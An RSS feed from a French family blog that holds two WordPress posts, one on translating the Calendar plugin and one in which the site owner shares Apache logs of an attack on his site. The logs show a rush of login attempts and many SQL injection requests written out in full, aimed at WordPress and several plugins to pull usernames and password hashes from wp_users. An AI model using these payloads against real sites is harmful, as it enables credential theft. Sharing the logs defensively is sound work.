<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Duretz sur le Net ! &#187; Technologie</title>
	<atom:link href="http://www.duretz.net/category/technologie/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.duretz.net</link>
	<description>Le portail de la famille Duretz</description>
	<lastBuildDate>Wed, 07 Dec 2011 14:54:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Internationalisation du plugin Calendar</title>
		<link>http://www.duretz.net/2009/02/24/internationalization-plugin-calendar/</link>
		<comments>http://www.duretz.net/2009/02/24/internationalization-plugin-calendar/#comments</comments>
		<pubDate>Tue, 24 Feb 2009 09:00:30 +0000</pubDate>
		<dc:creator>Laurent Duretz</dc:creator>
				<category><![CDATA[Technologie]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[translation]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.duretz.net/?p=143</guid>
		<description><![CDATA[Pour les besoins d&#8217;un autre site WordPress , j&#8217;ai internationalisé le plugin Calendar.
Les modifications apportées dans le codes sont :

Insertion des fonctions load_plugin_textdomain(), __() et _e() pour l&#8217;internationalisation
Nouveaux fichiers de langue MO et PO
Support de la langue  [...]]]></description>
			<content:encoded><![CDATA[<p>Pour les besoins d&#8217;un autre site WordPress , j&#8217;ai internationalisé le plugin <a title="Bibliothèque de plugins WordPress" href="http://wordpress.org/extend/plugins/calendar/">Calendar</a>.</p>
<p>Les modifications apportées dans le codes sont :</p>
<ul>
<li>Insertion des fonctions load_plugin_textdomain(), __() et _e() pour l&#8217;internationalisation</li>
<li>Nouveaux fichiers de langue MO et PO</li>
<li>Support de la langue française</li>
</ul>
<p>Toutes les modifications ont été testées sur WP 2.7.1.</p>
<p>J&#8217;ai contacté l&#8217;auteur pour qu&#8217;il inclue ces modifications dans la version officielle.</p>
<p>Si vous ne supportez pas d&#8217;attendre, vous pouvez télécharger l&#8217;archive <a href="http://www.duretz.net/wp-content/uploads/2009/02/calendar.zip">ici</a>.</p>
<p>Amusez vous bien !</p>
]]></content:encoded>
			<wfw:commentRss>http://www.duretz.net/2009/02/24/internationalization-plugin-calendar/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Une attaque avec libwhisker</title>
		<link>http://www.duretz.net/2009/01/14/a-libwhisker-attack/</link>
		<comments>http://www.duretz.net/2009/01/14/a-libwhisker-attack/#comments</comments>
		<pubDate>Wed, 14 Jan 2009 10:10:49 +0000</pubDate>
		<dc:creator>Laurent Duretz</dc:creator>
				<category><![CDATA[Technologie]]></category>
		<category><![CDATA[attack]]></category>
		<category><![CDATA[SQL injection]]></category>

		<guid isPermaLink="false">http://www.duretz.net/?p=140</guid>
		<description><![CDATA[Ce site a subi une attaque depuis un serveur letton.  Rien de sérieux mais c&#8217;est la seconde fois ce mois-ci.
Vous pouvez jeter un œil aux logs apache ci dessous.


?View Code  [...]]]></description>
			<content:encoded><![CDATA[<p>Ce site a subi une attaque depuis un serveur letton.  Rien de sérieux mais c&#8217;est la seconde fois ce mois-ci.</p>
<p>Vous pouvez jeter un œil aux logs apache ci dessous.<br />
<span id="more-140"></span></p>

<div class="wp_codebox_msgheader"><span class="right"><sup><a href="http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examples" target="_blank" title="WP-CodeBox HowTo?"><span style="color: #99cc00">?</span></a></sup></span><span class="left"><a href="javascript:;" onclick="javascript:showCodeTxt('p140code2'); return false;">View Code</a> APACHE</span><div class="codebox_clear"></div></div><div class="wp_codebox"><table><tr id="p1402"><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
</pre></td><td class="code" id="p140code2"><pre class="apache" style="font-family:monospace;">94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:09:<span style="color: #ff0000;">56</span> +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:09:<span style="color: #ff0000;">57</span> +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:09:<span style="color: #ff0000;">58</span> +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:09:<span style="color: #ff0000;">58</span> +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:09:<span style="color: #ff0000;">58</span> +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:09:<span style="color: #ff0000;">59</span> +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:09:<span style="color: #ff0000;">59</span> +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:00 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:00 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:01 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:01 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:02 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:02 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:03 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:03 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:03 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:04 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:04 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:05 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:05 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:07 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:07 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:08 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:08 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:09 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:09 +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">11</span> +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">13</span> +0100] <span style="color: #7f007f;">&quot;POST /wp-login.php HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">2920</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">15</span> +0100] <span style="color: #7f007f;">&quot;GET /index.php?feed=rss2&amp;amp;p=11/**/union/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a),2/**/from/**/wp_users/**/where/**/user_id=1/* HTTP/1.1&quot;</span> <span style="color: #ff0000;">301</span> - <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">17</span> +0100] <span style="color: #7f007f;">&quot;GET /index.php?exact=1&amp;amp;sentence=1&amp;amp;s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">14673</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">24</span> +0100] <span style="color: #7f007f;">&quot;GET /index.php?exact=1&amp;amp;sentence=1&amp;amp;s=%a3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">14673</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">25</span> +0100] <span style="color: #7f007f;">&quot;GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null%20FROM%20wp_users/* HTTP/1.1&quot;</span> <span style="color: #ff0000;">301</span> - <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">25</span> +0100] <span style="color: #7f007f;">&quot;GET /index.php?cat=%2527%20UNION%20SELECT%20CONCAT(0x3a,user_login,0x3a,user_pass,0x3a)%20FROM%20wp_users/* HTTP/1.1&quot;</span> <span style="color: #ff0000;">301</span> - <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">26</span> +0100] <span style="color: #7f007f;">&quot;GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null%20FROM%20wp_users/* HTTP/1.1&quot;</span> <span style="color: #ff0000;">301</span> - <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">27</span> +0100] <span style="color: #7f007f;">&quot;GET /wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(0x3a,user_login,0x3a,user_pass,0x3a)+FROM+wp_users-- HTTP/1.1&quot;</span> <span style="color: #ff0000;">404</span> <span style="color: #ff0000;">16231</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">28</span> +0100] <span style="color: #7f007f;">&quot;GET /wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4+from+wp_users--&amp;amp;display=plain HTTP/1.1&quot;</span> <span style="color: #ff0000;">404</span> <span style="color: #ff0000;">16247</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">29</span> +0100] <span style="color: #7f007f;">&quot;GET /wp-content/plugins/wp-download/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from/**/wp_users/* HTTP/1.1&quot;</span> <span style="color: #ff0000;">404</span> <span style="color: #ff0000;">16259</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">30</span> +0100] <span style="color: #7f007f;">&quot;GET /index.php?page_id=13&amp;amp;album=lala&amp;amp;photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201 HTTP/1.1&quot;</span> <span style="color: #ff0000;">301</span> - <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">31</span> +0100] <span style="color: #7f007f;">&quot;GET /forums?forum=1&amp;amp;topic=-99999/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users/* HTTP/1.1&quot;</span> <span style="color: #ff0000;">404</span> <span style="color: #ff0000;">16185</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">32</span> +0100] <span style="color: #7f007f;">&quot;GET /sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users/* HTTP/1.1&quot;</span> <span style="color: #ff0000;">404</span> <span style="color: #ff0000;">16173</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">33</span> +0100] <span style="color: #7f007f;">&quot;GET /sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x3a,user_login,0x3a,user_pass,0x3a),0,0,0,0,0/**/FROM/**/wp_users/* HTTP/1.1&quot;</span> <span style="color: #ff0000;">404</span> <span style="color: #ff0000;">16197</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">34</span> +0100] <span style="color: #7f007f;">&quot;GET /wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users HTTP/1.1&quot;</span> <span style="color: #ff0000;">404</span> <span style="color: #ff0000;">16263</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">35</span> +0100] <span style="color: #7f007f;">&quot;GET /wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x3a,user_login,0x3a,user_pass,0x3a),concat(0x3a,user_login,0x3a,user_pass,0x3a),4,5/**/FROM/**/wp_users HTTP/1.1&quot;</span> <span style="color: #ff0000;">404</span> <span style="color: #ff0000;">16285</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">36</span> +0100] <span style="color: #7f007f;">&quot;GET /wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,concat(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null,null,null,null,null,null%20%20from%20wp_users HTTP/1.1&quot;</span> <span style="color: #ff0000;">404</span> <span style="color: #ff0000;">16357</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">40</span> +0100] <span style="color: #7f007f;">&quot;GET /wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x3a,user_login,0x3a,user_pass,0x3a)%20from%20wp_users HTTP/1.1&quot;</span> <span style="color: #ff0000;">404</span> <span style="color: #ff0000;">16211</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">41</span> +0100] <span style="color: #7f007f;">&quot;GET /wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4,5,6,7%20from%20wp_users-- HTTP/1.1&quot;</span> <span style="color: #ff0000;">404</span> <span style="color: #ff0000;">16241</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
